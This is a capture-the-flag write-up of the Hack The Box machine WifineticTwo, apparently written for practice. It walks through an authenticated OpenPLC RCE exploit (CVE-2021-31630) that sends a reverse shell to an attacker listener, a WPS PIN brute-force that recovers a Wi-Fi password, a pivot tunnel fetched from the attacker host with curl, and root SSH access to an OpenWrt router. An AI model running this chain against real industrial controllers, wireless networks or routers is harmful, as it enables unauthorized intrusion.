HTB - WifineticTwo
Machine Info
WifineticTwo is a medium-difficulty Linux machine that features OpenPLC running on port 8080, vulnerable to Remote Code Execution through the manual exploitation of [CVE-2021-31630]. After obtaining an initial foothold on the machine, a WPS attack is performed to acquire the Wi-Fi password for an Access Point (AP). This access allows the attacker to target the router running OpenWRT and gain a root shell via its web interface.
Enumeration
Scope
IP Address: 10.10.11.7
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
8080/tcp open http-proxy syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open http-proxy Werkzeug/1.0.1 Python/2.7.18
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.10.11.7:8080/login
<SNIP>* Open ports: 22 - 8080
* Services: SSH - HTTP
* Important notes: openPLC┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/CVE-2021-31630-HTB]
└─$ sudo sh -c "echo '$ip wifinetictwo.htb' >> /etc/hosts"
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/CVE-2021-31630-HTB]
└─$ tail -n1 /etc/hosts
10.10.11.7 wifinetictwo.htbhttp://10.10.11.7:8080/login
A quick search about OpenPLC CVEs
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ searchsploit OpenPLC
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenPLC 3 - Remote Code Execution (Authenticated) | python/webapps/49803.py
OpenPLC WebServer 3 - Denial of Service | multiple/dos/51746.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Initial Access
I don't have credential yet, So I tried default one: openplc:openplc and It worked
http://10.10.11.7:8080/dashboard
The exploit we have need credential, now I can run it.
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ git clone https://github.com/thewhiteh4t/cve-2021-31630.git
<snip>
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/cve-2021-31630]
└─$ python3 cve_2021_31630.py -u openplc -p openplc -lh 10.10.16.7 -lp 443 http://10.10.11.7:8080
------------------------------------------------
--- CVE-2021-31630 -----------------------------
--- OpenPLC WebServer v3 - Authenticated RCE ---
------------------------------------------------
[>] Found By : Fellipe Oliveira
[>] PoC By : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
[>] Target : http://10.10.11.7:8080
[>] Username : openplc
[>] Password : openplc
[>] Timeout : 200 secs
[>] LHOST : 10.10.16.7
[>] LPORT : 443
[!] Checking status...
[+] Service is Online!
[!] Logging in...
[+] Logged in!
[!] Restoring default program...
[+] PLC Stopped!
[+] Cleanup successful!
[!] Uploading payload...
[+] Payload uploaded!
[+] Waiting for 5 seconds...
[+] Compilation successful!
[!] Starting PLC...
[+] PLC Started! Check listener...
[!] Cleaning up...
[+] PLC Stopped!
[+] Cleanup successful! Receive Connection
┌──(kali㉿kali)-[~/study/Courses/HackThebox/HTB/machines/WifineticTwo]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.7] 47504
id
uid=0(root) gid=0(root) groups=0(root) Upgrade the shell
script /dev/null -c bash
Ctrl+z
stty -echo raw; fg
reset
Terminal type? screen
stty rows 37 columns 189
export TERM=xterm-256colorI found my myself running command as root, maybe I'm in docker container or kind of virtualization.
The user flag is in /root directory
root@attica01:/# ls /root
user.txt
root@attica01:~# cat user.txt
850e68329cf676exxxxxxxxxxxxxxxxUser Flag: 850e68329cf676exxxxxxxxxxxxxxxx
Privilege Escalation
The IP Address of the machine is not here, that makes me sure I'm not on the actual host. There is wlan0 interface also.
root@attica01:/# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.3.2 netmask 255.255.255.0 broadcast 10.0.3.255
inet6 fe80::216:3eff:fefc:910c prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:fc:91:0c txqueuelen 1000 (Ethernet)
RX packets 5716 bytes 529625 (529.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4286 bytes 1207374 (1.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 715 bytes 39478 (39.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 715 bytes 39478 (39.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0I uploaded linpeas.sh to the hox to enumerate and collect useful info from the host but didn't find anything interesting
linpeas.sh tells me that it's a virtual machine (lxc)
═╣ Is this a virtual machine? ..... Yes (lxc) Enumerating installed program shows that there are wireless tools here
root@attica01:~$ apt list --installed | cut -d"/" -f1,3
<snip>
whiptail
wireless-regdb
wireless-tools
wpasupplicant
<snip>Following up this post, I was able to deal with wireless technology in that host:
root@attica01:~$ iw wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
last seen: 4928.704s [boottime]
TSF: 1721706237223201 usec (19927d, 03:43:57)
freq: 2412
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: plcrouter
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 1
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Supported operating classes:
* current operating class: 81
Extended capabilities:
* Extended Channel Switching
* SSID List
* Operating Mode Notification
WPS: * Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* Response Type: 3 (AP)
* UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
* Manufacturer:
* Model:
* Model Number:
* Serial Number:
* Primary Device Type: 0-00000000-0
* Device name:
* Config methods: Label, Display, Keypad
* Version2: 2.0I got a hint from community about oneshot tool that attacks wireless by brute force attack.
root@attica01:~$ python3 oneshot.py -i wlan0
[*] Running wpa_supplicant…
[*] BSSID not specified (--bssid) — scanning for available networks
Networks list:
# BSSID ESSID Sec. PWR WSC device name WSC model
1) 02:00:00:00:01:00 plcrouter WPA2 -30
Select target (press Enter to refresh): 1
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WPS Message M3
[*] Sending WPS Message M4…
[*] Received WPS Message M5
[+] The first half of the PIN is valid
[*] Sending WPS Message M6…
[*] Received WPS Message M7
[+] WPS PIN: '12345670'
[+] WPA PSK: 'NoWWEDoKnowWhaxxxxxxxxxxx'
[+] AP SSID: 'plcrouter'Connect to plcrouter network
root@attica01:~$ wpa_passphrase plcrouter >> /etc/wpa_supplicant/wpa_supplicant.conf
# reading passphrase from stdin
NoWWEDoKnowWhaxxxxxxxxxxx
root@attica01:~$ wpa_supplicant -B -D wext -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
ioctl[SIOCSIWENCODEEXT]: Invalid argument
ioctl[SIOCSIWENCODEEXT]: Invalid argumentVerify successful connection
root@attica01:~# iw wlan0 link
Connected to 02:00:00:00:01:00 (on wlan0)
SSID: plcrouter
freq: 2412
RX: 16029 bytes (229 packets)
TX: 1116 bytes (11 packets)
signal: -30 dBm
rx bitrate: 1.0 MBit/s
tx bitrate: 12.0 MBit/s
bss flags: short-slot-time
dtim period: 2
beacon int: 100But I didn't get an IP Address
root@attica01:~# ip addr show wlan0
5: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
inet6 fe80::ff:fe00:200/64 scope link
valid_lft forever preferred_lft foreverAdding one.
I wasn't sure which CIDR IP to assign to the interface, so I decided to give it a try.
root@attica01:~$ ifconfig wlan0 192.168.1.5 netmask 255.255.255.0
root@attica01:~$ ifconfig wlan0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.5 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:200 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)I set up a tunnel to enumerate the new network from my kali machine.
┌──(kali㉿kali)-[~/…/Tools/Pivot/ligolo-ng]
└─$ ./proxy-server -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended)
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
ligolo-ng »root@attica01:~$ curl 10.10.16.7/agent.sh -o agent.sh
root@attica01:~$ chmod +x agent.sh
root@attica01:~$ ./agent.sh -connect 10.10.16.7:11601 -ignore-certligolo-ng » session
1
ligolo-ng » startAdd the network route to ligolo interface and Ping sweep the network with fping
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ sudo ip route add 192.168.1.0/24 dev ligolo
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ fping -asgq 192.168.1.0/24
192.168.1.1
192.168.1.5192.168.1.5 is the IP I assigned to wlan0 interface, So I will attack 192.168.1.1
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ nmap 192.168.1.1 -F -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 00:19 EDT
Nmap scan report for 192.168.1.1
Host is up (0.10s latency).
Not shown: 92 closed tcp ports (conn-refused)
PORT STATE SERVICE
7/tcp filtered echo
22/tcp open ssh
53/tcp open domain
80/tcp open http
443/tcp open https
514/tcp filtered shell
2001/tcp filtered dc
49154/tcp filtered unknownI found ssh is there, so I tried to connect to it as root
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ ssh root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
ED25519 key fingerprint is SHA256:ZcoOrJ2dytSfHYNwN2vcg6OsZjATPopYMLPVYhczadM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (ED25519) to the list of known hosts.
BusyBox v1.36.1 (2023-11-14 13:38:11 UTC) built-in shell (ash)
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-----------------------------------------------------
OpenWrt 23.05.2, r23630-842932a63d
-----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------
root@ap:~# root@ap:~$ cat root.txt
bd361577bf4d8653xxxxxxxxxxxxxxxxRoot Flag: bd361577bf4d8653xxxxxxxxxxxxxxxx
Last updated